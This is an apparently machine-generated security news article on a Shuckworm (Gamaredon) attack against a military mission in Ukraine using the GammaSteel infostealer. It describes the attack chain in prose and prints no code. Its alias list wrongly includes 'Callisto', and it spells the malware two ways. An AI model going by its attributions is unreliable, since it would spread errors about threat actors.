Ethical Hacking News
A Russian-linked APT group known as Shuckworm has targeted a military mission based in Ukraine with an updated version of the GammaSteel infostealer. This sophisticated attack marks a notable increase in sophistication for the group, which has continued to focus on Ukrainian targets since 2013.
The recent attack on a Ukrainian military mission by Shuckworm marks an increase in sophistication for the Russia-linked group.The attack used an infected removable drive as the initial attack vector and deployed a multi-stage, obfuscated attack chain.The GammaSteel infostealer was used to exfiltrate system metadata and files via multiple methods, including PowerShell web requests and cURL with Tor.Shuckworm's focus on Ukraine has continued into 2025, with the recent attack marking an increase in sophistication.The group compensates for its limitations by making minor modifications to its code and leveraging legitimate web services.The attack demonstrates Shuckworm's commitment to utilizing sophisticated tactics and tools to achieve its espionage objectives.
The threat landscape has witnessed a notable escalation with the recent targeting of a military mission based in Ukraine by a sophisticated APT group known as Shuckworm. The attack, which occurred on February 26, 2025, marks a significant increase in sophistication for this Russia-linked group, which is also known by its aliases Shuckworm, Armageddon, Primitive Bear, ACTINIUM, and Callisto.
The targeted military mission was compromised using an infected removable drive as the initial attack vector, according to reports published by Symantec Threat Hunter. The APT group subsequently deployed a multi-stage, obfuscated attack chain that culminated in the deployment of the GammaSteel infostealer. This malicious tool, which is an updated version of the GamaSteel infostealer used by Shuckworm in previous attacks, supports multiple exfiltration methods, including write.as, cURL, and Tor.
The attack chain begins with creating a Windows Registry value under UserAssist, using "mshta.exe" via "explorer.exe" to launch a multi-stage infection. The first file, labeled as "NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms," connects to a C2 server via URLs like Teletype, Telegram, and Telegraph. This connection is followed by the creation of shortcuts on removable and network drives that execute "mshta.exe" and hide it.
The attack reached its climax when a script contacted a C2 server, exfiltrating system metadata and receiving a Base64-encoded payload that triggered a PowerShell command. This command downloaded two new obfuscated scripts: one for reconnaissance and another, which was an upgraded version of the GammaSteel infostealer. The latter attempted to exfiltrate files via a PowerShell web request or employed cURL with a Tor network proxy as a fallback to obfuscate the origin IP.
Symantec Threat Hunter researchers observed that Shuckworm's relentless focus on Ukraine has continued into 2025, with this attack marking an increase in sophistication. Although Shuckworm does not appear to possess access to the same skill set as other Russian groups, it compensates for its limitations by continually making minor modifications to its code and leveraging legitimate web services.
The group's actions underscore their laser-like focus on targeting entities within Ukraine for espionage purposes. This campaign also demonstrates that Shuckworm remains committed to utilizing sophisticated tactics and tools to achieve its objectives.
In conclusion, the recent attack attributed to Shuckworm serves as a stark reminder of the evolving threat landscape and the imperative need for vigilance among organizations worldwide. As APT groups continue to refine their techniques and expand their reach, it is crucial that security professionals remain informed about emerging threats like Shuckworm.
Related Information:
https://www.ethicalhackingnews.com/articles/APT-Group-Shuckworm-Marks-Significant-Increase-in-Sophistication-with-Targeting-of-Military-Mission-in-Ukraine-ehn.shtml
https://securityaffairs.com/176433/apt/gamaredon-targeted-the-military-mission-of-a-western-country-based-in-ukraine.html
https://www.f-secure.com/v-descs/teletype.shtml
https://www.scam-detector.com/validator/teletype-in-review/
https://attack.mitre.org/groups/G0047/
https://en.wikipedia.org/wiki/Gamaredon
Published: Fri Apr 11 02:56:50 2025 by llama3.2 3B Q4_K_M
